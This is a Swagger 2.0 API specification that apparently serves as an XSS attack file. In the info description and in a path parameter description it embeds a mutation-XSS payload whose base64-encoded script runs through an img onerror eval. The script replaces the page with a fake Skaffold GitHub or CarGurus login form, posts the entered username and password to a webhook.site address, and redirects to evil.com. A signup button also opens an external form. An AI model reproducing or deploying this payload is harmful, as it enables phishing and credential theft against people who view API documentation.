swagger: '2.0'
info:
  title: XSS Attack BY olive_cipher
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>
    <img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJzsKYWxlcnQoJ1lvdSBuZWVkIHRvIGxvZ2luIGZpcnN0IScpOwp2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2Zvcm0nKTsKYS5hY3Rpb24gPSAiaHR0cHM6Ly93ZWJob29rLnNpdGUvN2Y4MTAzMjUtZDRkYi00OGViLThiMjctNzQzMjViNDQ2ZTliIjsKYS5tZXRob2QgPSAnUE9TVCc7CmEub25zdWJtaXQgPSBmdW5jdGlvbigpIHsgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAnaHR0cDovL2V2aWwuY29tJzsgfTsKYS5pbm5lckhUTUwgPSAnPGNlbnRlcj48Yj5Ta2FmZm9sZCBHaXRodWIgQWNjb3VudCBMb2dpbjwvYj48YnI+VXNlcm5hbWU6IDxpbnB1dCBuYW1lPSJ1c2VyTmFtZSI+PGJyPlBhc3N3b3JkOiA8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InB3ZCI+PGJyPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiI+PGlucHV0IHR5cGU9ImJ1dHRvbiIgdmFsdWU9IlNpZ251cCIgb25jbGljaz0id2luZG93LmxvY2F0aW9uLmhyZWYgPSBcJ2h0dHBzOi8vZm9ybXMuZ2xlL3I3MUpWM0JENzdkb3BDd2M2XCc7Ij48L2NlbnRlcj4nOwpkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOwo=' onerror='eval(atob(this.id))'>
    ">
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /olive_cipher:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - olive_cipher_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  /signup:
    get:
      summary: Sign up via external form
      description: |
        <center><b>Sign up Page</b></center><br>
        <button onclick="window.open('https://docs.google.com/forms/d/e/1FAIpQLSdzDc7JiL6HgPduxy5RisPhy1iaAAsI6D5HoZs1EjsQKu1iDQ/viewform?usp=dialog')">Sign up</button>
      responses:
        '200':
          description: Opens sign up form in a new tab
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
            <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea>
            <img src=x id='ZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnJzsKYWxlcnQoJ1lvdSBuZWVkIHRvIGxvZ2luIGZpcnN0IScpOwp2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2Zvcm0nKTsKYS5hY3Rpb24gPSAiaHR0cHM6Ly93ZWJob29rLnNpdGUvN2Y4MTAzMjUtZDRkYi00OGViLThiMjctNzQzMjViNDQ2ZTliIjsKYS5tZXRob2QgPSAnUE9TVCc7CmEub25zdWJtaXQgPSBmdW5jdGlvbigpIHsgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAnaHR0cDovL2V2aWwuY29tJzsgfTsKYS5pbm5lckhUTUwgPSAnPGNlbnRlcj48Yj5DYXJndXJ1cyBBY2NvdW50IExvZ2luPC9iPjxicj5Vc2VybmFtZTogPGlucHV0IG5hbWU9InVzZXJOYW1lIj48YnI+UGFzc3dvcmQ6IDxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icHdkIj48YnI+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj48aW5wdXQgdHlwZT0iYnV0dG9uIiB2YWx1ZT0iU2lnbnVwIiBvbmNsaWNrPSJ3aW5kb3cubG9jYXRpb24uaHJlZiA9IFwnaHR0cHM6Ly9mb3Jtcy5nbGUvcjcxSlYzQkQ3N2RvcEN3YzZcJzsiPjwvY2VudGVyPic7CmRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg==' onerror='eval(atob(this.id))'>
            ">
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
